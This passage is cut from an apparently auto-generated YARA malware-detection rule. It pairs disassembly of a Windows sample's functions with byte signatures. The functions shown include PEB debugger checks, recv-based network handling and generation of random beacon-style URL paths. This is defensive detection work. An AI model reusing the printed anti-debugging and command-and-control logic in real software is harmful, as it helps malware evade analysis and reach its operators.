83bdf0f9ffffff cmp dword [ebp - 1552],0xffffffff + .text:0x0040232e 751d jnz 0x0040234d + .text:0x00402330 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00402336 52 push edx + .text:0x00402337 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0) + .text:0x0040233d ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00402343 b801000000 mov eax,1 + .text:0x00402348 e9e4000000 jmp 0x00402431 + .text:0x0040234d loc_0040234d: [2 XREFS] + .text:0x0040234d 6a00 push 0 + .text:0x0040234f 6800020000 push 512 + .text:0x00402354 8d85f4f9ffff lea eax,dword [ebp - 1548] + .text:0x0040235a 50 push eax + .text:0x0040235b 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00402361 51 push ecx + .text:0x00402362 ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local1552,512) + .text:0x00402368 8945fc mov dword [ebp - 4],eax + .text:0x0040236b 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040236f 7e71 jle 0x004023e2 + .text:0x00402371 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00402377 0355fc add edx,dword [ebp - 4] + .text:0x0040237a 8b4518 mov eax,dword [ebp + 24] + .text:0x0040237d 3b10 cmp edx,dword [eax] + .text:0x0040237f 7619 jbe 0x0040239a + .text:0x00402381 8d8df4fbffff lea ecx,dword [ebp - 1036] + .text:0x00402387 51 push ecx + .text:0x00402388 e893f8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x0040238d 83c404 add esp,4 + .text:0x00402390 b801000000 mov eax,1 + .text:0x00402395 e997000000 jmp 0x00402431 + .text:0x0040239a loc_0040239a: [1 XREFS] + .text:0x0040239a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040239d 8db5f4f9ffff lea esi,dword [ebp - 1548] + .text:0x004023a3 8b7d14 mov edi,dword [ebp + 20] + .text:0x004023a6 03bdf8fbffff add edi,dword [ebp - 1032] + .text:0x004023ac 8bd1 mov edx,ecx + .text:0x004023ae c1e902 shr ecx,2 + .text:0x004023b1 f3a5 rep: movsd + .text:0x004023b3 8bca mov ecx,edx + .text:0x004023b5 83e103 and ecx,3 + .text:0x004023b8 f3a4 rep: movsb + .text:0x004023ba 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x004023c0 0345fc add eax,dword [ebp - 4] + .text:0x004023c3 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x004023c9 6880c04000 push 0x0040c080 + .text:0x004023ce 8b4d14 mov ecx,dword [ebp + 20] + .text:0x004023d1 51 push ecx + .text:0x004023d2 e849170000 call 0x00403b20 ;_strstr(arg3,0x0040c080) + .text:0x004023d7 83c408 add esp,8 + .text:0x004023da 85c0 test eax,eax + .text:0x004023dc 7402 jz 0x004023e0 + .text:0x004023de eb2a jmp 0x0040240a + .text:0x004023e0 loc_004023e0: [1 XREFS] + .text:0x004023e0 eb1e jmp 0x00402400 + .text:0x004023e2 loc_004023e2: [1 XREFS] + .text:0x004023e2 837dfc00 cmp dword [ebp - 4],0 + .text:0x004023e6 7502 jnz 0x004023ea + .text:0x004023e8 eb16 jmp 0x00402400 + .text:0x004023ea loc_004023ea: [1 XREFS] + .text:0x004023ea 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x004023f0 52 push edx + .text:0x004023f1 e82af8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x004023f6 83c404 add esp,4 + .text:0x004023f9 b801000000 mov eax,1 + .text:0x004023fe eb31 jmp 0x00402431 + .text:0x00402400 loc_00402400: [2 XREFS] + .text:0x00402400 837dfc00 cmp dword [ebp - 4],0 + .text:0x00402404 0f8f43ffffff jg 0x0040234d + .text:0x0040240a loc_0040240a: [1 XREFS] + .text:0x0040240a 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00402410 50 push eax + .text:0x00402411 e80af8ffff call 0x00401c20 ;sub_00401c20(local1040) + .text:0x00402416 83c404 add esp,4 + .text:0x00402419 85c0 test eax,eax + .text:0x0040241b 7407 jz 0x00402424 + .text:0x0040241d b801000000 mov eax,1 + .text:0x00402422 eb0d jmp 0x00402431 + .text:0x00402424 loc_00402424: [1 XREFS] + .text:0x00402424 8b4d18 mov ecx,dword [ebp + 24] + .text:0x00402427 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x0040242d 8911 mov dword [ecx],edx + .text:0x0040242f 33c0 xor eax,eax + .text:0x00402431 loc_00402431: [5 XREFS] + .text:0x00402431 5f pop edi + .text:0x00402432 5e pop esi + .text:0x00402433 5b pop ebx + .text:0x00402434 8be5 mov esp,ebp + .text:0x00402436 5d pop ebp + .text:0x00402437 c3 ret + */ + $c35 = { 55 8B EC 81 EC 1C 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 98 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 88 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 8D BD ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 7E ?? 8B 95 ?? ?? ?? ?? 03 55 ?? 8B 45 ?? 3B 10 76 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 4D ?? 8D B5 ?? ?? ?? ?? 8B 7D ?? 03 BD ?? ?? ?? ?? 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 8B 85 ?? ?? ?? ?? 03 45 ?? 89 85 ?? ?? ?? ?? 68 80 C0 40 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? EB ?? EB ?? 83 7D ?? 00 75 ?? EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 83 7D ?? 00 0F 8F ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 4D ?? 8B 95 ?? ?? ?? ?? 89 11 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402440@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402440 + .text:0x00402440 FUNC: int cdecl sub_00402440( ) [6 XREFS] + .text:0x00402440 + .text:0x00402440 Stack Variables: (offset from initial top of stack) + .text:0x00402440 -8: int local8 + .text:0x00402440 -12: int local12 + .text:0x00402440 -16: int local16 + .text:0x00402440 -20: int local20 + .text:0x00402440 + .text:0x00402440 55 push ebp + .text:0x00402441 8bec mov ebp,esp + .text:0x00402443 83ec10 sub esp,16 + .text:0x00402446 53 push ebx + .text:0x00402447 56 push esi + .text:0x00402448 57 push edi + .text:0x00402449 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402450 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402457 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040245d 8a5802 mov bl,byte [eax + 2] + .text:0x00402460 885df8 mov byte [ebp - 8],bl + .text:0x00402463 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402467 85c0 test eax,eax + .text:0x00402469 7405 jz 0x00402470 + .text:0x0040246b e890ebffff call 0x00401000 ;sub_00401000() + .text:0x00402470 loc_00402470: [1 XREFS] + .text:0x00402470 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402476 8b4018 mov eax,dword [eax + 24] + .text:0x00402479 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040247d 8945f4 mov dword [ebp - 12],eax + .text:0x00402480 837df400 cmp dword [ebp - 12],0 + .text:0x00402484 7405 jz 0x0040248b + .text:0x00402486 e875ebffff call 0x00401000 ;sub_00401000() + .text:0x0040248b loc_0040248b: [1 XREFS] + .text:0x0040248b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402491 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402495 83e870 sub eax,112 + .text:0x00402498 8945f0 mov dword [ebp - 16],eax + .text:0x0040249b 837df000 cmp dword [ebp - 16],0 + .text:0x0040249f 7505 jnz 0x004024a6 + .text:0x004024a1 e85aebffff call 0x00401000 ;sub_00401000() + .text:0x004024a6 loc_004024a6: [2 XREFS] + .text:0x004024a6 b901000000 mov ecx,1 + .text:0x004024ab 85c9 test ecx,ecx + .text:0x004024ad 7456 jz 0x00402505 + .text:0x004024af e8f6160000 call 0x00403baa ;_rand() + .text:0x004024b4 8845fc mov byte [ebp - 4],al + .text:0x004024b7 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024bb 83fa7f cmp edx,127 + .text:0x004024be 7e08 jle 0x004024c8 + .text:0x004024c0 8a45fc mov al,byte [ebp - 4] + .text:0x004024c3 2c7f sub al,127 + .text:0x004024c5 8845fc mov byte [ebp - 4],al + .text:0x004024c8 loc_004024c8: [1 XREFS] + .text:0x004024c8 0fbe4dfc movsx ecx,byte [ebp - 4] + .text:0x004024cc 83f930 cmp ecx,48 + .text:0x004024cf 7c09 jl 0x004024da + .text:0x004024d1 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024d5 83fa39 cmp edx,57 + .text:0x004024d8 7e24 jle 0x004024fe + .text:0x004024da loc_004024da: [1 XREFS] + .text:0x004024da 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x004024de 83f861 cmp eax,97 + .text:0x004024e1 7c09 jl 0x004024ec + .text:0x004024e3 0fbe4dfc movsx ecx,byte [ebp - 4] + .text:0x004024e7 83f97a cmp ecx,122 + .text:0x004024ea 7e12 jle 0x004024fe + .text:0x004024ec loc_004024ec: [1 XREFS] + .text:0x004024ec 0fbe55fc movsx edx,byte [ebp - 4] + .text:0x004024f0 83fa41 cmp edx,65 + .text:0x004024f3 7c0e jl 0x00402503 + .text:0x004024f5 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x004024f9 83f85a cmp eax,90 + .text:0x004024fc 7f05 jg 0x00402503 + .text:0x004024fe loc_004024fe: [2 XREFS] + .text:0x004024fe 8a45fc mov al,byte [ebp - 4] + .text:0x00402501 eb02 jmp 0x00402505 + .text:0x00402503 loc_00402503: [2 XREFS] + .text:0x00402503 eba1 jmp 0x004024a6 + .text:0x00402505 loc_00402505: [2 XREFS] + .text:0x00402505 5f pop edi + .text:0x00402506 5e pop esi + .text:0x00402507 5b pop ebx + .text:0x00402508 8be5 mov esp,ebp + .text:0x0040250a 5d pop ebp + .text:0x0040250b c3 ret + */ + $c36 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? B9 01 00 00 00 85 C9 74 ?? E8 ?? ?? ?? ?? 88 45 ?? 0F BE 55 ?? 83 FA 7F 7E ?? 8A 45 ?? 2C 7F 88 45 ?? 0F BE 4D ?? 83 F9 30 7C ?? 0F BE 55 ?? 83 FA 39 7E ?? 0F BE 45 ?? 83 F8 61 7C ?? 0F BE 4D ?? 83 F9 7A 7E ?? 0F BE 55 ?? 83 FA 41 7C ?? 0F BE 45 ?? 83 F8 5A 7F ?? 8A 45 ?? EB ?? EB ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402510@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402510 + .text:0x00402510 FUNC: int cdecl sub_00402510( int arg0, ) [2 XREFS] + .text:0x00402510 + .text:0x00402510 Stack Variables: (offset from initial top of stack) + .text:0x00402510 4: int arg0 + .text:0x00402510 -8: int local8 + .text:0x00402510 -12: int local12 + .text:0x00402510 -16: int local16 + .text:0x00402510 -20: int local20 + .text:0x00402510 -24: int local24 + .text:0x00402510 + .text:0x00402510 55 push ebp + .text:0x00402511 8bec mov ebp,esp + .text:0x00402513 83ec14 sub esp,20 + .text:0x00402516 53 push ebx + .text:0x00402517 56 push esi + .text:0x00402518 57 push edi + .text:0x00402519 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402520 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00402527 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040252d 8a5802 mov bl,byte [eax + 2] + .text:0x00402530 885df4 mov byte [ebp - 12],bl + .text:0x00402533 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00402537 85c0 test eax,eax + .text:0x00402539 7405 jz 0x00402540 + .text:0x0040253b e8c0eaffff call 0x00401000 ;sub_00401000() + .text:0x00402540 loc_00402540: [1 XREFS] + .text:0x00402540 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402546 8b4018 mov eax,dword [eax + 24] + .text:0x00402549 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040254d 8945f0 mov dword [ebp - 16],eax + .text:0x00402550 837df000 cmp dword [ebp - 16],0 + .text:0x00402554 7405 jz 0x0040255b + .text:0x00402556 e8a5eaffff call 0x00401000 ;sub_00401000() + .text:0x0040255b loc_0040255b: [1 XREFS] + .text:0x0040255b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402561 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402565 83e870 sub eax,112 + .text:0x00402568 8945ec mov dword [ebp - 20],eax + .text:0x0040256b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040256f 7505 jnz 0x00402576 + .text:0x00402571 e88aeaffff call 0x00401000 ;sub_00401000() + .text:0x00402576 loc_00402576: [1 XREFS] + .text:0x00402576 6a00 push 0 + .text:0x00402578 e84b160000 call 0x00403bc8 ;_time(ecx,edx,0) + .text:0x0040257d 83c404 add esp,4 + .text:0x00402580 50 push eax + .text:0x00402581 e81a160000 call 0x00403ba0 ;sub_00403ba0(sub_00403bc8(ecx,edx,0)) + .text:0x00402586 83c404 add esp,4 + .text:0x00402589 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040258c 894dfc mov dword [ebp - 4],ecx + .text:0x0040258f c745f800000000 mov dword [ebp - 8],0 + .text:0x00402596 eb09 jmp 0x004025a1 + .text:0x00402598 loc_00402598: [1 XREFS] + .text:0x00402598 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040259b 83c201 add edx,1 + .text:0x0040259e 8955f8 mov dword [ebp - 8],edx + .text:0x004025a1 loc_004025a1: [1 XREFS] + .text:0x004025a1 837df804 cmp dword [ebp - 8],4 + .text:0x004025a5 7d15 jge 0x004025bc + .text:0x004025a7 e894feffff call 0x00402440 ;sub_00402440() + .text:0x004025ac 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025af 8801 mov byte [ecx],al + .text:0x004025b1 8b55fc mov edx,dword [ebp - 4] + .text:0x004025b4 83c201 add edx,1 + .text:0x004025b7 8955fc mov dword [ebp - 4],edx + .text:0x004025ba ebdc jmp 0x00402598 + .text:0x004025bc loc_004025bc: [1 XREFS] + .text:0x004025bc 8b45fc mov eax,dword [ebp - 4] + .text:0x004025bf c6002f mov byte [eax],47 + .text:0x004025c2 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025c5 83c101 add ecx,1 + .text:0x004025c8 894dfc mov dword [ebp - 4],ecx + .text:0x004025cb c745f800000000 mov dword [ebp - 8],0 + .text:0x004025d2 eb09 jmp 0x004025dd + .text:0x004025d4 loc_004025d4: [1 XREFS] + .text:0x004025d4 8b55f8 mov edx,dword [ebp - 8] + .text:0x004025d7 83c201 add edx,1 + .text:0x004025da 8955f8 mov dword [ebp - 8],edx + .text:0x004025dd loc_004025dd: [1 XREFS] + .text:0x004025dd 837df804 cmp dword [ebp - 8],4 + .text:0x004025e1 7d15 jge 0x004025f8 + .text:0x004025e3 e858feffff call 0x00402440 ;sub_00402440() + .text:0x004025e8 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004025eb 8801 mov byte [ecx],al + .text:0x004025ed 8b55fc mov edx,dword [ebp - 4] + .text:0x004025f0 83c201 add edx,1 + .text:0x004025f3 8955fc mov dword [ebp - 4],edx + .text:0x004025f6 ebdc jmp 0x004025d4 + .text:0x004025f8 loc_004025f8: [1 XREFS] + .text:0x004025f8 8b45fc mov eax,dword [ebp - 4] + .text:0x004025fb c6002e mov byte [eax],46 + .text:0x004025fe 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00402601 83c101 add ecx,1 + .text:0x00402604 894dfc mov dword [ebp - 4],ecx + .text:0x00402607 c745f800000000 mov dword [ebp - 8],0 + .text:0x0040260e eb09 jmp 0x00402619 + .text:0x00402610 loc_00402610: [1 XREFS] + .text:0x00402610 8b55f8 mov edx,dword [ebp - 8] + .text:0x00402613 83c201 add edx,1 + .text:0x00402616 8955f8 mov dword [ebp - 8],edx + .text:0x00402619 loc_00402619: [1 XREFS] + .text:0x00402619 837df803 cmp dword [ebp - 8],3 + .text:0x0040261d 7d15 jge 0x00402634 + .text:0x0040261f e81cfeffff call 0x00402440 ;sub_00402440() + .text:0x00402624 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00402627 8801 mov byte [ecx],al + .text:0x00402629 8b55fc mov edx,dword [ebp - 4] + .text:0x0040262c 83c201 add edx,1 + .text:0x0040262f 8955fc mov dword [ebp - 4],edx + .text:0x00402632 ebdc jmp 0x00402610 + .text:0x00402634 loc_00402634: [1 XREFS] + .text:0x00402634 8b45fc mov eax,dword [ebp - 4] + .text:0x00402637 c60000 mov byte [eax],0 + .text:0x0040263a 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040263d 83c101 add ecx,1 + .text:0x00402640 894dfc mov dword [ebp - 4],ecx + .text:0x00402643 33c0 xor eax,eax + .text:0x00402645 5f pop edi + .text:0x00402646 5e pop esi + .text:0x00402647 5b pop ebx + .text:0x00402648 8be5 mov esp,ebp + .text:0x0040264a 5d pop ebp + .text:0x0040264b c3 ret + */ + $c37 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 83 C4 04 50 E8 ?? ?? ?? ?? 83 C4 04 8B 4D ?? 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 04 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 2F 8B 4D ?? 83 C1 01 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 04 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 2E 8B 4D ?? 83 C1 01 89 4D ?? C7 45 ?? 00 00 00 00 EB ?? 8B 55 ?? 83 C2 01 89 55 ?? 83 7D ?? 03 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? 88 01 8B 55 ?? 83 C2 01 89 55 ?? EB ?? 8B 45 ?? C6 00 00 8B 4D ?? 83 C1 01 89 4D ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402650@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402650 + .text:0x00402650 FUNC: int cdecl sub_00402650( int arg0, int arg1, ) [2 XREFS] + .text:0x00402650 + .text:0x00402650 Stack Variables: (offset from initial top of stack) + .text:0x00402650 8: int arg1 + .text:0x00402650 4: int arg0 + .text:0x00402650 -4100: int local4100 + .text:0x00402650 -4104: int local4104 + .text:0x00402650 -4120: int local4120 + .text:0x00402650 -4124: int local4124 + .text:0x00402650 -4128: int local4128 + .text:0x00402650 -4132: int local4132 + .text:0x00402650 -5156: int local5156 + .text:0x00402650 -5160: int local5160 + .text:0x00402650 -5164: int local5164 + .text:0x00402650 -5168: int local5168 + .text:0x00402650 -5172: int local5172 + .text:0x00402650 + .text:0x00402650 55 push ebp + .text:0x00402651 8bec mov ebp,esp + .text:0x00402653 b830140000 mov eax,0x00001430 + .text:0x00402658 e813130000 call 0x00403970 ;__alloca_probe() + .text:0x0040265d 53 push ebx + .text:0x0040265e 56 push esi + .text:0x0040265f 57 push edi + .text:0x00402660 c785e4efffff0010 mov dword [ebp - 4124],0x00001000 + .text:0x0040266a c785d4ebffff0000 mov dword [ebp - 5164],0 + .text:0x00402674 c785d0ebffff0000 mov dword [ebp - 5168],0 + .text:0x0040267e 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402684 8a5802 mov bl,byte [eax + 2] + .text:0x00402687 889dd8ebffff mov byte [ebp - 5160],bl + .text:0x0040268d 0fbe85d8ebffff movsx eax,byte [ebp - 5160] + .text:0x00402694 85c0 test eax,eax + .text:0x00402696 7405 jz 0x0040269d + .text:0x00402698 e863e9ffff call 0x00401000 ;sub_00401000() + .text:0x0040269d loc_0040269d: [1 XREFS] + .text:0x0040269d 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004026a3 8b4018 mov eax,dword [eax + 24] + .text:0x004026a6 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004026aa 8985d4ebffff mov dword [ebp - 5164],eax + .text:0x004026b0 83bdd4ebffff00 cmp dword [ebp - 5164],0 + .text:0x004026b7 7405 jz 0x004026be + .text:0x004026b9 e842e9ffff call 0x00401000 ;sub_00401000() + .text:0x004026be loc_004026be: [1 XREFS] + .text:0x004026be 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004026c4 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004026c8 83e870 sub eax,112 + .text:0x004026cb 8985d0ebffff mov dword [ebp - 5168],eax + .text:0x004026d1 83bdd0ebffff00 cmp dword [ebp - 5168],0 + .text:0x004026d8 7505 jnz 0x004026df + .text:0x004026da e821e9ffff call 0x00401000 ;sub_00401000() + .text:0x004026df loc_004026df: [1 XREFS] + .text:0x004026df 6800040000 push 1024 + .text:0x004026e4 8d8de0ebffff lea ecx,dword [ebp - 5152] + .text:0x004026ea 51 push ecx + .text:0x004026eb e8d0efffff call 0x004016c0 ;sub_004016c0(local5156,1024) + .text:0x004026f0 83c408 add esp,8 + .text:0x004026f3 85c0 test eax,eax + .text:0x004026f5 740a jz 0x00402701 + .text:0x004026f7 b801000000 mov eax,1 + .text:0x004026fc e975010000 jmp 0x00402876 + .text:0x00402701 loc_00402701: [1 XREFS] + .text:0x00402701 8d95dcebffff lea edx,dword [ebp - 5156] + .text:0x00402707 52 push edx + .text:0x00402708 e883f0ffff call 0x00401790 ;sub_00401790(local5160) + .text:0x0040270d 83c404 add esp,4 + .text:0x00402710 85c0 test eax,eax + .text:0x00402712 740a jz 0x0040271e + .text:0x00402714 b801000000 mov eax,1 + .text:0x00402719 e958010000 jmp 0x00402876 + .text:0x0040271e loc_0040271e: [1 XREFS] + .text:0x0040271e 6a10 push 16 + .text:0x00402720 8d85ecefffff lea eax,dword [ebp - 4116] + .text:0x00402726 50 push eax + .text:0x00402727 e8e4fdffff call 0x00402510 ;sub_00402510(local4120) + .text:0x0040272c 83c408 add esp,8 + .text:0x0040272f 85c0 test eax,eax + .text:0x00402731 740a jz 0x0040273d + .text:0x00402733 b801000000 mov eax,1 + .text:0x00402738 e939010000 jmp 0x00402876 + .text:0x0040273d loc_0040273d: [1 XREFS] + .text:0x0040273d 8d8de4efffff lea ecx,dword [ebp - 4124] + .text:0x00402743 51 push ecx + .text:0x00402744 8d9500f0ffff lea edx,dword [ebp - 4096] + .text:0x0040274a 52 push edx + .text:0x0040274b 8d85ecefffff lea eax,dword [ebp - 4116] + .text:0x00402751 50 push eax + .text:0x00402752 8b8ddcebffff mov ecx,dword [ebp - 5156] + .text:0x00402758 51 push ecx + .text:0x00402759 8d95e0ebffff lea edx,dword [ebp - 5152] + .text:0x0040275f 52 push edx + .text:0x00402760 e84bfaffff call 0x004021b0 ;sub_004021b0(local5156,0xfefefefe,local4120,local4100,local4128) + .text:0x00402765 83c414 add esp,20 + .text:0x00402768 85c0 test eax,eax + .text:0x0040276a 740a jz 0x00402776 + .text:0x0040276c b801000000 mov eax,1 + .text:0x00402771 e900010000 jmp 0x00402876 + .text:0x00402776 loc_00402776: [1 XREFS] + .text:0x00402776 68a8c04000 push 0x0040c0a8 + .text:0x0040277b 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402781 50 push eax + .text:0x00402782 e899130000 call 0x00403b20 ;_strstr(local4100,0x0040c0a8) + .text:0x00402787 83c408 add esp,8 + .text:0x0040278a 8985fcefffff mov dword [ebp - 4100],eax + .text:0x00402790 83bdfcefffff00 cmp dword [ebp - 4100],0 + .text:0x00402797 750a jnz 0x004027a3 + .text:0x00402799 b801000000 mov eax,1 + .text:0x0040279e e9d3000000 jmp 0x00402876 + .text:0x004027a3 loc_004027a3: [1 XREFS] + .text:0x004027a3 8b8dfcefffff mov ecx,dword [ebp - 4100] + .text:0x004027a9 898de0efffff mov dword [ebp - 4128],ecx + .text:0x004027af 68a0c04000 push 0x0040c0a0 + .text:0x004027b4 8b95fcefffff mov edx,dword [ebp - 4100] + .text:0x004027ba 52 push edx + .text:0x004027bb e860130000 call 0x00403b20 ;_strstr(sub_00403b20(local4100,0x0040c0a8),0x0040c0a0) + .text:0x004027c0 83c408 add esp,8 + .text:0x004027c3 8985fcefffff mov dword [ebp - 4100],eax + .text:0x004027c9 83bdfcefffff00 cmp dword [ebp - 4100],0 + .text:0x004027d0 750a jnz 0x004027dc + .text:0x004027d2 b801000000 mov eax,1 + .text:0x004027d7 e99a000000 jmp 0x00402876 + .text:0x004027dc loc_004027dc: [1 XREFS] + .text:0x004027dc 8b85fcefffff mov eax,dword [ebp - 4100] + .text:0x004027e2 8985e8efffff mov dword [ebp - 4120],eax + .text:0x004027e8 8b8de8efffff mov ecx,dword [ebp - 4120] + .text:0x004027ee 2b8de0efffff sub ecx,dword [ebp - 4128] + .text:0x004027f4 83c101 add ecx,1 + .text:0x004027f7 3b4d0c cmp ecx,dword [ebp + 12] + .text:0x004027fa 7e07 jle 0x00402803 + .text:0x004027fc b801000000 mov eax,1 + .text:0x00402801 eb73 jmp 0x00402876 + .text:0x00402803 loc_00402803: [1 XREFS] + .text:0x00402803 8b95e8efffff mov edx,dword [ebp - 4120] + .text:0x00402809 2b95e0efffff sub edx,dword [ebp - 4128] + .text:0x0040280f bfa8c04000 mov edi,0x0040c0a8 + .text:0x00402814 83c9ff or ecx,0xffffffff + .text:0x00402817 33c0 xor eax,eax + .text:0x00402819 f2ae repnz: scasb + .text:0x0040281b f7d1 not ecx + .text:0x0040281d 83c1ff add ecx,0xffffffff + .text:0x00402820 2bd1 sub edx,ecx + .text:0x00402822 bfa8c04000 mov edi,0x0040c0a8 + .text:0x00402827 83c9ff or ecx,0xffffffff + .text:0x0040282a 33c0 xor eax,eax + .text:0x0040282c f2ae repnz: scasb + .text:0x0040282e 